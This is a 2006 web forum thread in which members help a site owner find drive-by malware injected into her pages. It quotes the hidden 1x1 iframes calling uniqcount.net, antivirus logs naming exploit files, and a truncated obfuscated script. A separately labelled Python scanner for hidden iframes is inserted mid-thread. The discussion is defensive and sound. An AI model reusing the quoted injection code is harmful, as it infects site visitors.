
09-23-2006, 09:44 AM
WebProWorld Member
Join Date: Jan 2005
Location: Ohio
Posts: 30
My Websites Keep Getting A Downloader Virus
Hope this is the right place to post this and someone can help. I had been running AVG alone until I got a couple of emails letting me know my sites had a virus. One was kind enough to let me know he was running Norton Internet Security. I bought it and sure enough, a downloader.
I can get rid of them for a couple of days by reuploading the index file and sometimes must also upload any php includes used on the index page. It keeps coming back though. My admin says it can't be my server.
Where do they come from, how do I stop them? The only help I get from Norton is how to remove a downloader from a computer. The problem is on my websites. Any help is so much appreciated. I'm lost.

09-23-2006, 12:58 PM
WebProWorld 1,000+ Club
Join Date: Aug 2003
Location: Worldwide
Posts: 7,399
Thread moved
Thread moved here in the "Internet Security Discussion Forum".
I hope you will get help here.

09-23-2006, 01:00 PM
WebProWorld 1,000+ Club
Join Date: Aug 2003
Location: Worldwide
Posts: 7,399
Re: My Websites Keep Getting A Downloader Virus
Quote:
|
Originally Posted by MichelleStillCantType
Where do they come from, how do I stop them? The only help I get from Norton is how to remove a downloader from a computer. The problem is on my websites. Any help is so much appreciated. I'm lost.
|
I would take the risk to check, if you would tell your site URL.

09-23-2006, 01:41 PM
WebProWorld Member
Join Date: Jan 2005
Location: Ohio
Posts: 30
Thank you!
Thank you so much. I believe I have them clear again so you should be safe but I can't promise that. Like I said they go away for a bit after I upload a new index file but then they come back out of the blue. It is across my many sites.
www.enjoyportclinton.com
www.thelakeerieguide.com
www.ecampsite.com
There are more, please tell me if you would like the URLs.

09-25-2006, 06:46 PM
WebProWorld Pro
Join Date: Apr 2004
Posts: 288
Well the virus is still there. I'm not sure which image is causing the problem, however the virus is stored in a cursor or animated image of some kind.
Info from the anti virus program that I use
It seems there is another virus that is run through a WMF (Windows Metafile - like the ones commonly used in Word)
More info

09-25-2006, 09:17 PM
WebProWorld Member
Join Date: Dec 2003
Location: Barbate, Spain
Posts: 90
I ran the risk as well, and yes the virus is still there along with the WMF virus.
Your server only serves up what you supply. If what you supply contains a virus, then your server will give it to the web. What you have uploaded to the server therefore must contain the viruses that we have found. So the answer to your question "where do they come from" is your own computer.
As you have recently bought Norton Internet Security I would suggest that you do a full system scan on your own PC using Norton and clear up any problems that are found. You then need to delete all the files from your server. You can do this from control panel if you have one, or by FTP. However it may be best to ask your admin to delete your files for you and reformat your web space, as viruses do have a knack of returning once killed. Then you should have a clean web space, and a clean computer from which to upload your files.
If your own computer doesn't have any problems, then just clean up your web space and upload everything again. If this doesn't cure the problem then you really do have a very weird problem.
Steve

09-25-2006, 09:51 PM
WebProWorld Veteran
Join Date: Jan 2004
Location: Fresh from Manhattan
Posts: 919
I got it too. I got 2 download viruses. Weird, I use AVG and it caught them. You say your AVG did not? Did you update it?

09-25-2006, 11:18 PM
WebProWorld Pro
Join Date: Apr 2004
Posts: 288
It looks like the uniqcount is being pulled through iframes.
Code:
<iframe src='http://uniqcount.net/adv/new.php?adv=171' width=1 height=1></iframe>
<iframe src='http://uniqcount.net/adv/171/new.php' width=1 height=1></iframe>
What I did was, I used the W3 Validator (http://validator.w3.org/) and clicked the checkbox to view source. This way I can view the source without worrying about the virus. I'm sure there are many ways to accomplish that, but this way worked fine for me.
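A defender-side check for the kind of injection identified in the post above, as an added example that is not part of the original thread: it scans a downloaded copy of a site's files for invisible iframes that load content from a host other than the site's own. The sample page, the `own_hosts` value and all function names are assumptions made for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))""")

def parse_attrs(tag):
    """Map lower-cased attribute names to values (quoted or unquoted)."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(tag)}

def is_tiny(value):
    """True for a dimension of 0 or 1 pixel, e.g. '1', '0', '1px'."""
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "", re.IGNORECASE)
    return bool(m) and int(m.group(1)) <= 1

def find_hidden_iframes(text, own_hosts):
    """Return (line_no, host, tag) for invisible iframes with an off-site src."""
    findings = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(0))
        host = (urlparse(attrs.get("src", "")).hostname or "").lower()
        style = attrs.get("style", "").replace(" ", "").lower()
        hidden = (is_tiny(attrs.get("width")) or is_tiny(attrs.get("height"))
                  or "display:none" in style or "visibility:hidden" in style)
        if hidden and host and host not in own_hosts:
            findings.append((text.count("\n", 0, m.start()) + 1, host, m.group(0)))
    return findings

def scan_tree(root, own_hosts, exts=(".php", ".html", ".htm", ".inc")):
    """Scan a local copy of the site; returns {path: findings} for flagged files."""
    report = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in exts:
            hits = find_hidden_iframes(p.read_text(errors="replace"), own_hosts)
            if hits:
                report[str(p)] = hits
    return report

# Constructed sample index.php; the two 1x1 iframes are the ones quoted in the thread.
SAMPLE = """<?php include 'header.php'; ?>
<iframe src="http://www.example.com/map.html" width="400" height="300"></iframe>
<iframe src='http://uniqcount.net/adv/new.php?adv=171' width=1 height=1></iframe>
<iframe src='http://uniqcount.net/adv/171/new.php' width=1 height=1></iframe>
<iframe src="/local/ping.html" width="0" height="0"></iframe>
"""
if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE, {"www.example.org"}): print(hit)
```

Running `scan_tree` against a fresh download after each cleanup shows whether the injection has returned and which files were touched.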

09-25-2006, 11:27 PM
WebProWorld Pro
Join Date: Apr 2004
Posts: 288
Just to see what the website actually looks like, I added uniqcount.net to my hosts file and pointed it at 127.0.0.1. That way any request that my computer makes to retrieve content from uniqcount.net is really looking locally for the files, therefore not downloading any viruses.

09-26-2006, 04:43 AM
WebProWorld New Member
Join Date: Sep 2006
Location: Pembrokeshire, UK
Posts: 1
Try Windows Defender, which (I think) is still currently a free download.
I had a problem that I could not get rid of for ages with different programs and the Defender (or to be accurate, its older version) finally cracked it.
Amazingly enough, something good seems to have come out of the Microsoft stable...!

09-26-2006, 04:54 AM
WebProWorld Veteran
Join Date: Aug 2003
Location: Singapore
Posts: 549
Time Module Object Name Threat Action User Information
9/26/2006 16:34:35 PM IMON file http://uniqcount.net/adv/171/sploit.anr Win32/TrojanDownloader.Ani.gen trojan Connection terminated 2765586738\home
9/26/2006 16:34:17 PM IMON archive http://uniqcount.net/adv/171/count.jar Java/ClassLoader.AA trojan Connection terminated 2765586738\home
Well, it is definitely confirmed that http://uniqcount.net has a trojan. Remove it and you should be okay.

09-26-2006, 10:40 AM
Moderator
Join Date: Jun 2006
Location: United States
Posts: 1,782
A software program you might want to try is Paros Proxy. This (free) program is a proxy server that you install on your computer, which allows you to view both the requests your web browser is making as well as the responses from the server, see the exact headers, and change or even block requests. I use it mostly to test design changes but for your issue it will help you narrow down why these files are being pushed to the clients. You will be able to use it to block the virus files from downloading as you work to locate the virus.
A few questions I have because you mentioned that it goes away after you run the antivirus: Do you own the server, or is it at your location? Also, if you don't own the server, is it a dedicated or shared server? If you like I could give it a cursory analysis and see if I see anything that looks vulnerable in the site/server itself.
__________________
The best way to learn anything, is to question everything.

09-26-2006, 10:44 AM
WebProWorld Member
Join Date: Sep 2006
Location: DFW
Posts: 91
Scan, Delete, Change Passwords and Upload New Clean Files
I would deep scan my PC, delete all files from server, change all passwords including your FTP and Hosting Account Passwords and republish clean copy of your website files to your server. I've had something similar to this happen to me and I was able to fix this by deleting the infected files and changing the password to prevent new infected files from being published to my server by the hacker.
__________________
E. Armand

09-26-2006, 10:53 AM
WebProWorld Veteran
Join Date: Aug 2003
Location: Singapore
Posts: 549
Re: Scan, Delete, Change Passwords and Upload New Clean File
Quote:
|
Originally Posted by EArmand
I would deep scan my PC, delete all files from server, change all passwords including your FTP and Hosting Account Passwords and republish clean copy of your website files to your server. I've had something similar to this happen to me and I was able to fix this by deleting the infected files and changing the password to prevent new infected files from being published to my server by the hacker.
|
Yes. I do agree with EArmand. That way any sign or existence of the worms, trojans or viruses in your server will be completely eliminated.

09-26-2006, 12:14 PM
WebProWorld Member
Join Date: Mar 2005
Location: Brewster, NY - USA
Posts: 71
I haven't run into the problem of this virus/trojan myself (so far), but I took precautions by using the link that dean had posted for CastleCops.com and I blocked the IP address range (81.95.144.0 - 81.95.147.255) that I found on the site in our company firewall. Hopefully, this will prevent anything being downloaded to our machines that's causing this problem.

09-26-2006, 01:30 PM
WebProWorld Veteran
Join Date: Sep 2003
Location: Halton Hills, ON
Posts: 582
Ask your host provider if they have an anti-virus solution on their servers. Most shared hosting does not, but they should.
Have the host delete the site then recreate it; that should get rid of it, provided that the virus hasn't spread to the server. If it has, you'll get it back again and your host provider will need to do a full scan and clean on their server(s).

09-26-2006, 01:42 PM
WebProWorld 1,000+ Club
Join Date: Jul 2003
Location: United Kingdom
Posts: 1,766
Got a couple of emails letting me know about a Virus
Quote:
|
Got a couple of emails letting me know about a Virus
|
Be careful about emails about Viruses if from an unknown source.
These emails may be:
a) phishing
b) have viruses embedded or link to virus sites.
c) are trying to get you to buy software you may not need.
d) reporting Spoof viruses

09-26-2006, 01:58 PM
WebProWorld Member
Join Date: Jan 2005
Location: Ohio
Posts: 30
Thank You!
I found it! I see the iframe with the http://uniqcount.net/adv/new.php?adv=171 url put into my index.php code. Thank you so much!
So basically this means I can solve the problem somewhat simply right?
Get my ftp username/pass changed and reupload new index files, correct?
Thank you again.

09-26-2006, 02:13 PM
WebProWorld New Member
Join Date: Apr 2006
Location: Houston, TX
Posts: 13
New Password and check for new accounts
Not only would I change your password for your FTP account, but I would make sure that you do not have any other unknown accounts set up that have FTP access.
I don't know if you have a management panel with your website that allows you to control user/email accounts and potentially make changes to components of your server configuration.
Good luck, and make sure your password is at least 9 characters and has at least one upper case letter and a number or symbol.
Fred

09-26-2006, 06:09 PM
Moderator
Join Date: Jun 2006
Location: United States
Posts: 1,782
Do you manage this server yourself or is it run by an outside company? If you own the server, you might want to invest in a vulnerability scanner that searches for and notifies you of possible weaknesses in the server. A free one is called Nessus from nessus.org (what can I say, I love free software). If your server is run by another company, they may knowingly and intentionally add the virus code to the pages they host. I have had it happen in the past with a web host forcing all sites to try to install spyware on visitor computers.
__________________
The best way to learn anything, is to question everything.

09-26-2006, 07:59 PM
WebProWorld Member
Join Date: Jan 2005
Location: Ohio
Posts: 30
Answers to questions
OK here is where I am so far in the event anyone else encounters this problem...
I downloaded an index file from my server and found two things in the code that I didn't put there.
iframe src='http://uniqcount.net/adv/new.php?adv=171' width=1 height=1
iframe src='http://uniqcount.net/adv/171/new.php' width=1 height=1
and the other is a java script...
script language blah blah blah
e = '0x00' + '36';str1 = "%8D%D5%DE%C3%A9%C4%C5%CE%DD%D2%8A%97%C3%DE%C4%DE% D7%DE%DD%DE%C5%CE%8F%D1%DE%D5%D5%D2%DB